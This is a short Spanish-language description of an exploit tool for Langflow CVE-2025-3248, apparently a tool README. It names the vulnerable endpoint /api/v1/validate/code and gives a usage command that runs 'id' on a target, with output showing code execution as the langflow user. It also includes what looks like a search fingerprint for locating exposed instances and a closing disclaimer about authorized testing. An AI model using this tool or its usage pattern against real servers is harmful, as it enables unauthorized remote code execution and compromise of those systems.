
Exploit de RCE en Langflow CVE-2025-3248
Exploit de ejecución remota de código (RCE) para aplicaciones Langflow vulnerables a CVE-2025-3248.
Endpoint afectado:
/api/v1/validate/code
python3 mitsec.py -u http://target:7860 -c "id"
[+] Command Output:
uid=1001(langflow) gid=1001(langflow) groups=1001(langflow)
exec() dinámico en una ruta de código controlada por el usuarioapp="Langflow"
Esta herramienta es solo para fines de pruebas de seguridad educativas y autorizadas. El uso no autorizado está prohibido.